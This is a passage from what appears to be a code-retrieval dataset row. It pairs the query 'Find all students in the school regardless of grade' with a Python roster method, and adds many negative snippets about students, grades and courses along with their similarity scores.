'warning',\n 'message': 'No student with UNI ' + uni + ' exists'\n })\n else:\n course.add_student(student)", "def GroundExcelAddGradeBoss(builder, GradeBoss):\n return AddGradeBoss(builder, GradeBoss)", "def create_student(faculty: str) -> None:\r\n global usernames, pointer, student_file_info\r\n username = usernames[pointer]\r\n password = username[:6][::-1]\r\n student_file_info.append([username, password, faculty])\r\n pointer += 1", "def main():\n given_scores = []\n num_grades = int(raw_input())\n for i in xrange(num_grades):\n given_scores.append(int(raw_input()))\n for score in grading_students(given_scores):\n print score", "def post_instructor():\n if request.method == 'POST':\n # check if the post request has the file part\n if 'file' not in request.files:\n flash('No file part')\n return redirect(request.url)\n if request.form['password'] != config['instructor_password']:\n return \"Sorry, wrong password.\"\n\n file = request.files['file']\n # if user does not select file, browser also\n # submit an empty part without filename\n if file.filename == '':\n flash('No selected file')\n return redirect(request.url)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\n grades = json.loads(populate(\"{}{}\".format(UPLOAD_FOLDER,(file.filename).replace(\" \", \"_\"))))\n\n for student in grades:\n try:\n db.session.delete(User.query.filter_by(hash=student).first())\n except UnmappedInstanceError:\n pass\n sqlStudent = User(student, grades[student])\n # sqlStudent = User.query.filter_by(hash=student).first()\n # sqlStudent.grades = grades[student]\n db.session.add(sqlStudent)\n\n db.session.commit()\n\n return \"Grades Updated. Success!\"", "def insert_course_enrollment(self, student_id, course_id, course_section_id):\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n try:\n with conn:\n cursor.execute(\n \"\"\"\n INSERT INTO course_enrollments ('student_id', 'course_id', 'course_section_id') VALUES\n (?,?,?)\"\"\",\n (student_id, course_id, course_section_id),\n )\n return 1\n except sqlite3.IntegrityError:\n return -1", "def book_session(self, session, subject):\n session.set_student(self)\n session.set_subject(subject)\n self.sessions.append(session)", "def add_profile(self, profile):\r\n self.profiles.append(profile)" ]
[ "0.812951", "0.7889351", "0.7747675", "0.75414544", "0.7533531", "0.74755746", "0.74255633", "0.7281956", "0.7157385", "0.70832974", "0.70647204", "0.7050774", "0.7042668", "0.70276797", "0.68648064", "0.67618066", "0.6695062", "0.661738", "0.6594988", "0.65615714", "0.6531732", "0.6485175", "0.6464271", "0.6387548", "0.63413024", "0.6317869", "0.62850213", "0.6280628", "0.6225494", "0.6219798", "0.6182781", "0.6175239", "0.6167274", "0.60992426", "0.60893583", "0.60617733", "0.60352117", "0.5933055", "0.5916891", "0.5914608", "0.591417", "0.5904989", "0.5901632", "0.5883114", "0.58714557", "0.5835433", "0.582627", "0.58174306", "0.58063406", "0.57695144", "0.57646096", "0.57595813", "0.57537127", "0.5751584", "0.57390165", "0.57378674", "0.573652", "0.5706888", "0.56954616", "0.569506", "0.56834596", "0.56639564", "0.56620157", "0.56606764", "0.5659888", "0.5649143", "0.56465876", "0.56370866", "0.5623403", "0.55862117", "0.5564973", "0.5551891", "0.55513215", "0.5540955", "0.55128825", "0.5505926", "0.54780364", "0.5474846", "0.5471519", "0.54625666", "0.54474086", "0.5447382", "0.5446589", "0.5435842", "0.543093", "0.5408138", "0.53853345", "0.53757817", "0.5373813", "0.5370687", "0.5342863", "0.53355926", "0.53327966", "0.53072435", "0.53063923", "0.5284922", "0.52847475", "0.52711695", "0.52663213", "0.5264165" ]
0.7927675
1
Find all students in the school regardless of grade.
def roster(self) -> list: return [student for grade in sorted(self.students) for student in self.students[grade]]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def students(self):\n\t\treturn self.grade_set.all().distinct()", "def get_all_failing_students(self):\n students = MyCollection()\n for student in self.__student_repository.get_all():\n failing = False\n for grade in self.__grade_repository.get_all():\n if \".\" + str(student.entity_id) in grade.entity_id and grade.grade_value < 5:\n failing = True\n if failing:\n students.append(student)\n return students", "def get_campus_students(session, school):\n # Parameter to avoid getting staff users\n parameters = {'filter[staff?]': False}\n users = get_all_pages(session, f'/campus/{school}/users', 100, params=parameters)\n ids = []\n\n for user in users:\n # Check that the user is not anonymized by checking first letters of login\n if not user['login'].startswith('3b3-'):\n ids.append(user['id'])\n\n return ids", "def find_students(self):\n from quizzer.models.attendance import Attendance\n from quizzer.models.semester import Semester\n\n semester = Semester.get_current()\n\n for attendance in Attendance.objects: # TODO: Use indexed query later.\n if attendance.semester == semester and attendance.class_ == self:\n yield attendance.student", "def get_all_allowed_students(self):\n if self.is_superuser:\n return Student.objects.all()\n\n # Students who this user manages\n manages = Q(case_manager=self)\n # Students in a class this user teaches\n teaches = Q(enrollment__section__teacher=self)\n\n valid_students = Student.objects.filter(teaches | manages)\n return valid_students", "def get_list_of_students(self):\n return self._students", "def all_students(self):\n \n with sqlite3.connect(self.db_path) as conn:\n # conn.row_factory = self.create_student\n conn.row_factory = lambda cursor, row: Student(\n row[1], row[2], row[3], row[5]\n )\n \n \n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select s.Id,\n s.FirstName,\n s.LastName,\n s.SlackHandle,\n s.CohortId,\n c.Name\n from Student s\n join Cohort c on s.CohortId = c.Id\n order by s.CohortId\n \"\"\")\n\n all_students = db_cursor.fetchall()\n\n # for student in all_students:\n # print(f'{student[1]} {student[2]} is in {student[5]}')\n\n # for student in all_students:\n # print(f'{student[1]} {student[2]} is in {student[5]}')\n\n for student in all_students:\n print(student)", "def all_students(self):\n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Student(\n row[1], row[2], row[3], row[5]\n )\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select s.StudentId,\n s.FirstName,\n s.LastName,\n s.SlackHandle,\n s.CohortId,\n c.Name\n from Student s\n join Cohort c on s.CohortId = c.CohortId\n order by s.CohortId\n \"\"\")\n\n all_students = db_cursor.fetchall()\n for student in all_students:\n print(student)", "def allStudents(self):\n if not self.isSorted:\n self.students.sort()\n self.isSorted=True\n #return copy of list of students\n for s in self.students:\n yield s", "def all_students(self):\n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Student(\n row[1], row[2], row[3], row[5]\n )\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select s.Id,\n s.FirstName,\n s.LastName,\n s.SlackHandle,\n s.CohortId,\n c.Name\n from Student s\n join Cohort c on s.CohortId = c.Id\n order by s.CohortId\n \"\"\")\n\n all_students = db_cursor.fetchall()\n\n for student in all_students:\n print(student)", "def all_students(self):\n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Student(row [1], row[2], row[3], row[5])\n\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select s.Id,\n s.first_name,\n s.Last_name,\n s.slack_handle,\n s.cohort_id,\n c.name\n from students s\n join cohorts c on s.cohort_id = c.id\n order by s.cohort_id\n \"\"\")\n\n all_students = db_cursor.fetchall()\n print('\\n***All Students***')\n\n for student in all_students:\n print(student)", "def get_students(self) -> List['Student']:\n return self.students.values()", "def get_all_students(hospital_codes, results_codes):\n data = pd.read_csv(\"res/Internship Lottery_April 8, 2018_11.54_correct encoding.csv\", encoding='iso-8859-8')\n students = []\n for i in range(2, 241):\n student = get_student(i + 2, data.iloc[i], hospital_codes, results_codes)\n if student is not None:\n students.append(student)\n\n return students", "def test_empty_student_list(self):\r\n gradeset_results = list(iterate_grades_for(self.course.id, []))\r\n self.assertEqual(gradeset_results, [])", "def get_students(self):\n if not self.is_sorted:\n self.students.sort()\n self.is_sorted = True\n for s in self.students:\n yield s", "def grade(self, grade_number: int):\n return self.students.setdefault(grade_number, [])", "def get_all_by_student(self, stud_id):\n l = []\n for item in self._items:\n if item.get_student() == stud_id:\n l.append(item)\n return l[:]", "def get_students(self):\n self.cur = self.conn.cursor(pymysql.cursors.DictCursor)\n self.cur.execute(\"SELECT * FROM studenten\")\n self.cur.close()\n\n return self.cur.fetchall()", "def allStudents(self):\n if not self.isSorted:\n self.students.sort()\n self.isSorted = True\n # Returns each element or each student in order, as needed.\n for student in self.students:\n yield student", "def query_all():\n\tstudents = session.query(Student).all()\n\treturn students", "def GetBestSchoolSituation(self):\n slist = self.StudentList\n dlist = self.DisciplineList\n glist = self.GradeList\n student_avg_list = []\n for studentID in slist.IDs:\n glist.SetQueryOptions(FilterAttribute=\"StudentID\", FilterValue=studentID, StrictFilter=True, OrderAttribute=\"ID\", Descending=False)\n disc_sums = {}\n disc_count = {}\n for gradeID in glist.QueryIDs:\n if glist[gradeID].DisciplineID not in disc_sums:\n disc_sums[glist[gradeID].DisciplineID] = glist[gradeID].Value\n disc_count[glist[gradeID].DisciplineID] = 1\n else:\n disc_sums[glist[gradeID].DisciplineID] += glist[gradeID].Value\n disc_count[glist[gradeID].DisciplineID] += 1\n if len(disc_sums) == 0:\n continue\n sum = 0\n count = 0\n for discID in disc_sums:\n disc_sums[discID] /= disc_count[discID]\n sum += disc_sums[discID]\n count += 1\n student_avg_list.append((slist[studentID], float(\"%.3f\" % (sum / count))))\n def get_avg_val(tupl):\n return tupl[1]\n student_avg_list = sorted(student_avg_list, key=get_avg_val, reverse=True)\n return student_avg_list", "def __ui_list_grades_by_student(self):\n student_id = input(\"Give student ID: \")\n try:\n list_of_grades = self.__grade_controller.get_grades_by_student(student_id)\n if len(list_of_grades) == 0:\n print(\"Student doesn't have any grade.\")\n return\n\n for g in list_of_grades:\n print(str(g))\n\n except GradeException as ge:\n print(ge)\n return", "def get_all_student_courses(cls, user):\n member_record = CourseMember.objects.filter(user=user)\n member_teacher = member_record.filter(type = 3)\n student_list = []\n\n for member in member_teacher:\n if member.course.pk not in student_list:\n student_list.append(member.course.pk)\n\n return student_list", "def main():\n given_scores = []\n num_grades = int(raw_input())\n for i in xrange(num_grades):\n given_scores.append(int(raw_input()))\n for score in grading_students(given_scores):\n print score", "def get_schools(self, academic_year=None) -> List[School]:\n\n payload = {\n \"view\": \"xml-20200810\",\n \"year\": academic_year.replace('-', '')\n }\n res = self._session.get(self._URL, params=payload)\n\n root = ET.fromstring(res.content)\n schools = root.findall(\".//school\")\n\n return [School(school) for school in schools]", "def get_sorted_students(self):\n results = self.__create_student_and_grade_dto()\n results.sort(self.__compare_dtos_on_grade)\n return results", "def getStudents(self):\n if not self.isSorted:\n self.students.sort()\n self.isSorted = True\n return self.students[:] #return copy of list of students", "def select_all_from_students_db(connection):\r\n with connection:\r\n r = connection.execute(GET_ALL_STUDENTS)\r\n return r.fetchall()", "def students(self):\n return self._parser.students", "def get_grades(self, student):\n try:\n return self.grades[student.id][:] # notice that a copy is returned\n except KeyError:\n raise ValueError('Student not in Grade Book.')", "def GetFailingStudents(self):\n slist = self.StudentList\n dlist = self.DisciplineList\n glist = self.GradeList\n failing_students = []\n for studentID in slist.IDs:\n glist.SetQueryOptions(FilterAttribute=\"StudentID\", FilterValue=studentID, StrictFilter=True, OrderAttribute=\"ID\", Descending=False)\n disc_sums = {}\n disc_count = {}\n for gradeID in glist.QueryIDs:\n if glist[gradeID].DisciplineID not in disc_sums:\n disc_sums[glist[gradeID].DisciplineID] = glist[gradeID].Value\n disc_count[glist[gradeID].DisciplineID] = 1\n else:\n disc_sums[glist[gradeID].DisciplineID] += glist[gradeID].Value\n disc_count[glist[gradeID].DisciplineID] += 1\n if len(disc_sums) == 0:\n continue\n failing_disciplines = []\n for discID in disc_sums:\n disc_sums[discID] /= disc_count[discID]\n if disc_sums[discID] < 5:\n failing_disciplines.append(discID)\n if len(failing_disciplines) == 0:\n continue\n result = [slist[studentID], []]\n for discID in failing_disciplines:\n result[1].append((dlist[discID], disc_sums[discID]))\n failing_students.append(result)\n return failing_students", "def __statistics_best_situation(self):\n students_list = self.__grade_controller.get_list_of_students_with_best_situation()\n if len(students_list) == 0:\n print(\"There is no student with a grade!\")\n return\n\n for student in students_list:\n print(str(student) + \"\\n\")", "def get_all_enrolled(self, discipline_id):\n students = MyCollection()\n for item in self.__student_repository.get_all():\n newID = str(discipline_id) + \".\" + str(item.entity_id)\n if not self.__link_repository.find_by_id(newID) is None:\n students.append(item)\n return students", "def get_students_of_class(students, class_name):\n for row in students:\n class_list = [row for row in students if row[4]== class_name]\n return class_list", "def get_student(self, **fields):\n existing_fields = [i.name for i in self._db.get_columns('students')]\n student_fields = {}\n for key, value in fields.items():\n if key in existing_fields:\n student_fields[key] = value\n additional_fields = ['parent_UID', 'parent_key'] # Additional fields that could be passed in args\n parent_fields = {}\n group_key = None\n for key, value in fields.items():\n if key == 'group_key':\n group_key = value\n if key in additional_fields:\n if key == 'parent_UID':\n parent_fields['UID'] = value\n else:\n parent_fields[key] = value\n parent = None if len(parent_fields) == 0 else Parents.get_or_none(**parent_fields)\n query = Students.select().filter(**student_fields)\n if group_key is not None:\n query = query.join(StudentsGroups).join(Groups).where(Groups.group_key == group_key)\n if parent is not None:\n query = query.where(Students.parent == parent)\n students = [i for i in query]\n # Expect single value if search by unique fields, list if by non-unique or by parent\n return students if len(students) > 1 else students[0] if len(students) == 1 else None", "def get_students(self):\n dist_on_foot = db.session.query(Activity.user_id.label('user_id'),\n func.sum(Activity.distance).label('on_foot')). \\\n filter(func.date(Activity.datetime) >= self.SEASON.start_date,\n func.date(Activity.datetime) <= self.SEASON.end_date,\n Activity.type.in_([ActivityType.Run, ActivityType.Walk])). \\\n group_by(Activity.user_id). \\\n subquery(with_labels=True)\n dist_on_bike = db.session.query(Activity.user_id.label('user_id'),\n func.sum(Activity.distance).label('on_bike')). \\\n filter(func.date(Activity.datetime) >= self.SEASON.start_date,\n func.date(Activity.datetime) <= self.SEASON.end_date,\n Activity.type.in_([ActivityType.Ride])). \\\n group_by(Activity.user_id). \\\n subquery(with_labels=True)\n data = db.session.query(User, dist_on_foot.c.on_foot, dist_on_bike.c.on_bike). \\\n select_from(User). \\\n outerjoin(dist_on_foot, User.id == dist_on_foot.c.user_id). \\\n outerjoin(dist_on_bike, User.id == dist_on_bike.c.user_id). \\\n filter(User.type == UserType.Student). \\\n order_by(User.last_name.asc(), User.first_name.asc())\n\n result = []\n for row in data:\n on_foot = row.on_foot or 0\n on_bike = row.on_bike or 0\n item = {\n 'name': row.User.first_name + ' ' + row.User.last_name,\n 'uk id': row.User.uk_id,\n 'on foot': round(on_foot, 1),\n 'on bike': round(on_bike, 1),\n 'points': round(on_foot + on_bike / 2, 2)\n }\n result.append(item)\n return result", "def find_all_users(cls, school_id):\n # Select from the table users where email_id = email_id limit 1 .\n # return a UserModel Object .\n return cls.query.order_by(User.username).all()", "def test_only_students_coursework(self):\n user = self.make_user()\n enrollment = EnrollmentFactory(grade_level__school_year__school=user.school)\n grade = GradeFactory(\n student=enrollment.student,\n graded_work__course_task__course__grade_levels=[enrollment.grade_level],\n )\n CourseworkFactory(course_task=grade.graded_work.course_task)\n\n with self.login(user):\n self.get_check_200(\"reports:progress\", pk=enrollment.id)\n\n assert self.get_context(\"courses\")[0][\"grades\"][0].coursework is None", "def test_only_students_courses(self):\n user = self.make_user()\n enrollment = EnrollmentFactory(grade_level__school_year__school=user.school)\n course = CourseFactory(grade_levels=[enrollment.grade_level])\n grade = GradeFactory(\n score=50,\n student=enrollment.student,\n graded_work__course_task__course=course,\n )\n grade_2 = GradeFactory(\n score=100,\n student=enrollment.student,\n graded_work__course_task__course=course,\n )\n GradeFactory(\n graded_work__course_task__course__grade_levels=[enrollment.grade_level]\n )\n\n with self.login(user):\n self.get_check_200(\"reports:progress\", pk=enrollment.id)\n\n assert self.get_context(\"courses\") == [\n {\n \"course\": grade.graded_work.course_task.course,\n \"grades\": [grade, grade_2],\n \"course_average\": 75,\n }\n ]", "def add_student(self, name: str, grade: int) -> None:\n school_grade = self.students.setdefault(grade, [])\n school_grade.append(name)\n school_grade.sort()", "def __ui_search_student_by_name(self, search):\n try:\n result = self.__student_controller.search_by_name(search)\n for student in result:\n print(str(student))\n\n except RepositoryException as re:\n print(re)\n return", "def ask_for_valid_school_id(name: str, classroom: Classroom) -> Optional[Student]:\n msg = f'<b>{name}</b> not found.'\n echo(msg, format=True)\n\n while True:\n school_id = ask('School id: ', default=None)\n if school_id is None:\n if ask('Skip student? ', type=bool):\n echo()\n return None\n else:\n continue\n\n try:\n student = Student(name, school_id)\n classroom.students.add(student)\n classroom.save()\n return student\n except ValueError:\n echo(f'School id exists for {student.display}')\n if ask('Reuse? ', type=bool):\n student = classroom.students.get(school_id=school_id)\n student.aliases.append(student.name)\n classroom.save()\n echo()\n return None", "def get_students(user):\n students = Student.query(ancestor=get_parent_key(user)).order(Student.rose_username).fetch()\n students_map = {}\n teams = []\n for student in students:\n students_map[student.key] = student\n if student.team not in teams:\n teams.append(student.team)\n return students, students_map, teams", "def get_grade_by_student(first_name):\n\n QUERY = \"\"\"\n SELECT g.project_title, g.grade \n FROM Students AS s JOIN Grades AS g \n ON s.github = g.student_github\n WHERE s.first_name = ?\n \"\"\"\n\n db_cursor.execute(QUERY, (first_name,))\n row = db_cursor.fetchall()\n \n if row != []:\n for project in row:\n print 'Grade for %s: %s' %(project[0], project[1])\n else:\n print 'Please try again and enter a FIRST NAME'", "def create_students():\n\n\t# create empty list\n\tstudent_list = []\n\n\t# import student classces\n\tstudent_list = create_student_class()\n\n\treturn student_list", "def get_students(\n self,\n gradebook_id='',\n simple=False,\n section_name='',\n include_photo=False,\n include_grade_info=False,\n include_grade_history=False,\n include_makeup_grades=False\n ):\n # These are parameters required for the remote API call, so\n # there aren't too many arguments, or too many variables\n # pylint: disable=too-many-arguments,too-many-locals\n\n # Set params by arguments\n params = dict(\n includePhoto=json.dumps(include_photo),\n includeGradeInfo=json.dumps(include_grade_info),\n includeGradeHistory=json.dumps(include_grade_history),\n includeMakeupGrades=json.dumps(include_makeup_grades),\n )\n\n url = 'students/{gradebookId}'\n if section_name:\n group_id, _ = self.get_section_by_name(section_name)\n if group_id is None:\n failure_message = (\n 'in get_students -- Error: '\n 'No such section %s' % section_name\n )\n log.critical(failure_message)\n raise PyLmodNoSuchSection(failure_message)\n url += '/section/{0}'.format(group_id)\n\n student_data = self.get(\n url.format(\n gradebookId=gradebook_id or self.gradebook_id\n ),\n params=params,\n )\n\n if simple:\n # just return dict with keys email, name, section\n student_map = dict(\n accountEmail='email',\n displayName='name',\n section='section'\n )\n\n def remap(students):\n \"\"\"Convert mit.edu domain to upper-case for student emails.\n\n The mit.edu domain for user email must be upper-case,\n i.e. MIT.EDU.\n\n Args:\n students (list): list of students\n\n Returns:\n dict: dictionary of updated student email domains\n \"\"\"\n newx = dict((student_map[k], students[k]) for k in student_map)\n # match certs\n newx['email'] = newx['email'].replace('@mit.edu', '@MIT.EDU')\n return newx\n\n return [remap(x) for x in student_data['data']]\n\n return student_data['data']", "def getGrades(self,student):\n try:\n return self.grades[student.getIdNum()][:]\n except KeyError:\n raise ValueError('Student not in grade book')", "def see_course_students(self, username: str, token: str, course_abbreviation: str) -> List[Tuple[str, float]]:\n\n # Validate user first\n if not self.validate(username=username, token=token, check_privilege='instructor'):\n raise RuntimeError(\"User not verified!\")\n\n # Get a DB cursor\n cursor = self._db_connection.cursor()\n\n # Get the course ID from the abbreviation\n cursor.execute('''\n SELECT course_id FROM courses WHERE course_abbreviation LIKE ?;\n ''', (course_abbreviation,))\n db_result = cursor.fetchone()\n\n # If no associated courses are found\n if db_result is None:\n RuntimeError(f\"Could not find course associated with: {course_abbreviation}\")\n\n # Extract the course ID from the returned tuple\n course_id = db_result[0]\n\n # Query database for all courses\n cursor.execute(\n '''\n SELECT \n uid,\n grade\n FROM \n enrollment_records\n WHERE\n course_id = ?\n ;\n ''', (course_id,))\n db_results = cursor.fetchall()\n\n # If no courses are available\n if db_results is None or len(db_results) == 0:\n return []\n\n # Build information dicts for every student enrolled in this course\n students = []\n for result in db_results:\n # Get the student's username (we don't want to be giving UIDs)\n student_name = self.get_username(result[0])\n\n # Build a course dict from the data\n students.append({\n \"name\": student_name,\n \"grade\": float(result[1])\n })\n\n # Return list of student info dictionaries\n return students", "def pass_assign_for_student(cls):\n today = datetime.date.today()\n assignments_list = Assignment.query.filter(Assignment.START_DATA <= today).all()\n return assignments_list", "def test_fetch_student_records(self) -> None:\n SIT: University = University(\n \"/Users/rdshah2005/Desktop/SSW810/Assignment9/SSW-810\")\n expected_result: List[str] = [['10103', 'Baldwin, C', 'SFEN', ['CS 501', 'SSW 564', 'SSW 567', 'SSW 687']], ['10115', 'Wyatt, X', 'SFEN', ['CS 545', 'SSW 564', 'SSW 567', 'SSW 687']], ['10172', 'Forbes, I', 'SFEN', ['SSW 555', 'SSW 567']], ['10175', 'Erickson, D', 'SFEN', ['SSW 564', 'SSW 567', 'SSW 687']], [\n '10183', 'Chapman, O', 'SFEN', ['SSW 689']], ['11399', 'Cordova, I', 'SYEN', ['SSW 540']], ['11461', 'Wright, U', 'SYEN', ['SYS 611', 'SYS 750', 'SYS 800']], ['11658', 'Kelly, P', 'SYEN', ['SSW 540']], ['11714', 'Morton, A', 'SYEN', ['SYS 611', 'SYS 645']], ['11788', 'Fuller, E', 'SYEN', ['SSW 540']]]\n computed_results: List[str] = list()\n\n for record in SIT.all_students.values():\n computed_results.append(record.fetch_student_records())\n\n self.assertEqual(expected_result, computed_results)", "def Students_in_class(l:list,d:str,c:str)->list:\n result=[]\n for s in l:\n if Student_is_enrolled(s,d,c):\n result.append(s)\n return result", "def generate_students(G, school_type,N_classes,class_size,p_children,p_parents):\n\tage_bracket = get_age_bracket(school_type)\n\t# mapping of classes to ages\n\tage_bracket_map = get_age_distribution(school_type, N_classes)\n\n\t# number of students of every age group required to fill all classes of \n\t# the school\n\tN_target_students = {age:0 for age in age_bracket_map.values()}\n\tfor age in age_bracket_map.values():\n\t\tN_target_students[age] += class_size \n\n\tN_current_students = {i:0 for i in age_bracket}\n\tstudent_counter = 1\n\tfamily_counter = 1\n\tfamily_member_counter = 1\n\n\t# generate students and their families until the school is full\n\twhile (np.asarray([N_target_students[age] for age in age_bracket]) - \\\n\t\tnp.asarray([N_current_students[age] for age in age_bracket])).sum() > 0:\n\n\n\t\tages, N_parents = generate_student_family(school_type, p_children,\n\t\t\t\t\t\t\t\t\t\t\t\t p_parents)\n\n\t\t# Keep the family if at least one of the children fits into the school. \n\t\t# Else the family has to be discarded and a new one created.\n\t\tfits_in_school = []\n\t\tdoesnt_fit = []\n\t\tstudent_nodes = []\n\t\tfamily_nodes = []\n\t\tfor age in ages:\n\t\t\t# there is room for a student with the given age in the school ->\n\t\t\t# add the node to the graph as student\n\t\t\tif age in age_bracket and \\\n\t\t\t N_current_students[age] < N_target_students[age]:\n\n\t\t\t\t# Note: student IDs are created here with a big \"S\" at first.\n\t\t\t\t# Later on (in the function assign_classes()), students will\n\t\t\t\t# be assigned to classes and student node IDs relabelled with\n\t\t\t\t# the final small \"s\" such that s1 is the first student of the\n\t\t\t\t# first class and sN is the last student in the last class.\n\t\t\t\tstudent_ID = 'S{:04d}'.format(student_counter)\n\t\t\t\tG.add_node(student_ID)\n\t\t\t\tnx.set_node_attributes(G, \\\n\t\t\t\t\t\t{student_ID:{'type':'student',\n\t\t\t\t\t\t\t\t\t 'age':age,\n\t\t\t\t\t\t\t\t\t 'family':family_counter}})\n\t\t\t\tstudent_counter += 1\n\t\t\t\tfits_in_school.append(age)\n\t\t\t\tstudent_nodes.append(student_ID)\n\t\t\t\tN_current_students[age] += 1\n\t\t\telse:\n\t\t\t\tdoesnt_fit.append(age)\n\n\t\t# at least one of the children did fit into the school:\n\t\tif len(fits_in_school) > 0:\n\t\t\t# add the students that didn't fit into the school as family members\n\t\t\tfor age in doesnt_fit:\n\t\t\t\tfamily_member_ID = 'f{:04d}'.format(family_member_counter)\n\t\t\t\tG.add_node(family_member_ID)\n\t\t\t\tnx.set_node_attributes(G, \\\n\t\t\t\t\t\t{family_member_ID:{'type':'family_member',\n\t\t\t\t\t\t\t\t\t\t 'age':age,\n\t\t\t\t\t\t\t\t\t\t 'family':family_counter,\n\t\t\t\t\t\t\t\t\t\t 'unit':'family'}})\n\t\t\t\tfamily_nodes.append(family_member_ID)\n\t\t\t\tfamily_member_counter += 1\n\n\t\t\t# parents\n\t\t\tfor parent in range(N_parents):\n\t\t\t\tfamily_member_ID = 'f{:04d}'.format(family_member_counter)\n\t\t\t\tG.add_node(family_member_ID)\n\t\t\t\tnx.set_node_attributes(G, \\\n\t\t\t\t\t\t{family_member_ID:{'type':'family_member',\n\t\t\t\t\t\t\t\t\t\t\t# Note: 20.5 is the age at which\n\t\t\t\t\t\t\t\t\t\t\t# the symptom and transmission risk\n\t\t\t\t\t\t\t\t\t\t\t# is that of an adult\n\t\t\t\t\t\t\t\t\t\t 'age':20.5,\n\t\t\t\t\t\t\t\t\t\t 'family':family_counter,\n\t\t\t\t\t\t\t\t\t\t 'unit':'family'}})\n\t\t\t\tfamily_member_counter += 1\n\t\t\t\tfamily_nodes.append(family_member_ID)\n\n\t\t\t# increase the family counter by one\n\t\t\tfamily_counter += 1\n\n\treturn family_member_counter, family_counter", "def all_instructors(self):\n \n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Instructor(row [1], row[2], row[3], row[5])\n\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select i.Id,\n i.first_name,\n i.Last_name,\n i.slack_handle,\n i.cohort_id,\n c.name\n from instructors i\n join cohorts c on i.cohort_id = c.id\n order by i.cohort_id\n \"\"\")\n\n all_students = db_cursor.fetchall()\n print('\\n***All Instructors***')\n\n for student in all_students:\n print(student)", "def func_Q1(db):\n grades_collection = db.grades\n student_list = list(grades_collection.distinct(\"student_id\", {}))\n\n return len(student_list)", "def get_all_grades(first_name, last_name):\n QUERY = \"\"\" SELECT s.first_name, s.last_name, g.project_title, g.grade \n FROM Students AS s \n INNER JOIN Grades AS g ON s.github = g.student_github\n WHERE s.first_name = ? AND s.last_name = ? \"\"\"\n db_cursor.execute(QUERY, (first_name, last_name))\n grades_data = db_cursor.fetchone()\n print grades_data[-1]", "def get_normalized_grades(cls):\n\n for grades in Students.students:\n normalized = []\n for course in cls.analized:\n try:\n normalized.append(\n (grades[course.index] - course.avg) / course.range\n )\n except:\n normalized.append(0)\n\n cls.grades_normalized.append(normalized)\n cls.Y.append(HOUSES.index(grades[1]))\n cls.m += 1", "def _create_students(self, num_students):\r\n return [self.create_student('robot%d' % i) for i in xrange(num_students)]", "def add_students() -> None:\r\n faculties = [\"Computer Science\", \"Performing Arts\", \"Engineering\", \"Economics\"]\r\n for faculty in faculties:\r\n for _ in range(50):\r\n create_student(faculty)", "def _create_students_with_state(self, num_students, state=None, grade=0, max_grade=1):\r\n self.define_option_problem(PROBLEM_URL_NAME)\r\n students = [\r\n UserFactory.create(username='robot%d' % i, email='robot+test+%d@edx.org' % i)\r\n for i in xrange(num_students)\r\n ]\r\n for student in students:\r\n CourseEnrollmentFactory.create(course_id=self.course.id, user=student)\r\n StudentModuleFactory.create(course_id=self.course.id,\r\n module_state_key=self.location,\r\n student=student,\r\n grade=grade,\r\n max_grade=max_grade,\r\n state=state)\r\n return students", "def find_delinquent_students(df):\n\n # TODO : Setup to print results with students name and email so an email\n # can quickly be sent to all students.\n\n def is_int(s):\n try:\n int(s)\n return True\n except ValueError:\n return False\n\n delinquent_students = []\n\n for name, group in df.groupby('Team ID'):\n na_cols = group.columns[group.isna().any()].tolist()\n num_members = len(group)\n delinquent_rater_nums = set([int(name.strip()[-1]) for name in na_cols\n if is_int(name.strip()[-1])])\n delinquent_students += [\n group['Student Name'][group['Rater #'] == num].values[0]\n for num in delinquent_rater_nums if num <= num_members]\n\n return delinquent_students", "def get_student():\n\n github = request.args.get('github')\n\n first, last, github = hackbright.get_student_by_github(github)\n\n rows = hackbright.get_grades_by_github(github)\n\n\n return render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n rows=rows)\n # return html", "def select_all_students(conn):\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM student\")\n\n rows = cur.fetchall()\n\n return rows # return the rows", "def get_grade_entries(user, assignments_map, students_map):\n grade_entries = GradeEntry.query(ancestor=get_parent_key(user)).fetch()\n for grade_entry in grade_entries:\n grade_entry.assignment = assignments_map[grade_entry.assignment_key]\n grade_entry.student = students_map[grade_entry.student_key]\n return grade_entries", "def search_student_view(request):\n try:\n students = Student.objects.annotate(full_name=Concat('first_name', V(' '), 'last_name')).filter(Q(first_name__icontains=request.GET.get('q', ''))|\n Q(last_name__icontains=request.GET.get('q', ''))|\n Q(full_name__icontains=request.GET.get('q', '')),\n parent__user__centre=request.user.centre\n ).order_by('last_name')\n except:\n students = Student.objects.filter(parent__user__centre=request.user.centre).order_by('last_name')\n return render(request, 'students.html', {'students': students})", "def get_students(self):\n return u', '.join([c.student.username for c in self.candidates.all()])", "def all_instructors(self):\n \n with sqlite3.connect(self.db_path) as conn:\n # conn.row_factory = self.create_student\n conn.row_factory = lambda cursor, row: Instructor(\n row[1], row[2], row[6], row[6], row[5]\n )\n \n \n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select i.Id,\n i.FirstName,\n i.LastName,\n i.SlackHandle,\n i.CohortId,\n i.Specialty,\n c.Name\n from Instructor i\n join Cohort c on i.CohortId = c.Id\n order by i.CohortId\n \"\"\")\n\n all_instructors = db_cursor.fetchall()\n\n # for student in all_students:\n # print(f'{student[1]} {student[2]} is in {student[5]}')\n\n # for student in all_students:\n # print(f'{student[1]} {student[2]} is in {student[5]}')\n\n for instructor in all_instructors:\n print(instructor)", "def get_school_name_urls():\n\tschools_tree = get_tree(\"http://www.gla.ac.uk/schools/\")\n\tns = 'http://exslt.org/regular-expressions'\n\tpath = '//div[@class=\"row standardContent\"]//a[re:match(@href, \"schools/[A-Za-z]+/\")]'\n\t# Get all the 